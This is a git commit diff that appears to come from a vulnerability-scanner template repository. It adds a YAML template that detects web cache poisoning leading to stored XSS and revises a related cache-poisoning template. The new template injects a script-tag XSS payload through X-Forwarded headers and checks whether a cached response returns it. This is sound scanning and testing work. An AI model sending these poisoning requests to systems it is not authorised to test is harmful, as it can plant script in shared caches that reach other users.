misc updates

2023-04-17 15:37:36 +05:30 · 2023-04-17 15:37:36 +05:30 · 851ce26033
parent 384dbd1969
commit 851ce26033
2 changed files with 47 additions and 12 deletions
--- a/vulnerabilities/generic/cache-poisoning-xss.yaml
+++ b/vulnerabilities/generic/cache-poisoning-xss.yaml
@ -0,0 +1,36 @@
+id: cache-poisoning-xss
+
+info:
+  name: Cache Poisoning - Stored XSS
+  author: melbadry9,xelkomy,akincibor
+  severity: high
+  reference:
+    - https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning
+    - https://portswigger.net/research/practical-web-cache-poisoning
+    - https://portswigger.net/web-security/web-cache-poisoning
+  tags: cache,generic,xss
+
+variables:
+  cache_key: "{{to_lower(rand_base(6))}}"
+  cache_header: "{{to_lower(rand_base(6))}}"
+  xss_payload: '"></script><script>alert(document.domain);</script>'
+
+requests:
+  - raw:
+      - |
+        GET /?{{cache_key}}=1 HTTP/1.1
+        Host: {{Hostname}}
+        X-Forwarded-Prefix: {{cache_header}}.xfp{{xss_payload}}
+        X-Forwarded-Host: {{cache_header}}.xfh{{xss_payload}}
+        X-Forwarded-For: {{cache_header}}.xff{{xss_payload}}
+
+      - |
+        GET /?{{cache_key}}=1 HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - contains(body_2, cache_header)
+          - contains(body_2, xss_payload)
+        condition: and
--- a/vulnerabilities/generic/cache-poisoning.yaml
+++ b/vulnerabilities/generic/cache-poisoning.yaml
@ -7,28 +7,27 @@ info:
  reference:
    - https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning
    - https://portswigger.net/research/practical-web-cache-poisoning
+    - https://portswigger.net/web-security/web-cache-poisoning
  tags: cache,generic

+variables:
+  cache_key: "{{to_lower(rand_base(6))}}"
+  cache_header: "{{to_lower(rand_base(6))}}"
+
 requests:
  - raw:
      - |
-        GET /?{{randstr}}=9 HTTP/1.1
+        GET /?{{cache_key}}=9 HTTP/1.1
        Host: {{Hostname}}
-        X-Forwarded-Prefix: prefix.cache.oast.pro
-        X-Forwarded-Host: host.cache.oast.pro
-        X-Forwarded-For: for.cache.oast.pro
+        X-Forwarded-Prefix: {{cache_header}}.xfp
+        X-Forwarded-Host: {{cache_header}}.xfh
+        X-Forwarded-For: {{cache_header}}.xff

      - |
-        GET /?{{randstr}}=9 HTTP/1.1
+        GET /?{{cache_key}}=9 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
-          - 'contains(body_2, "cache.oast.pro")'
-
-    extractors:
-      - type: regex
-        part: response
-        regex:
-          - "(prefix|host|for).cache.oast.pro"
+          - 'contains(body_2, cache_header)'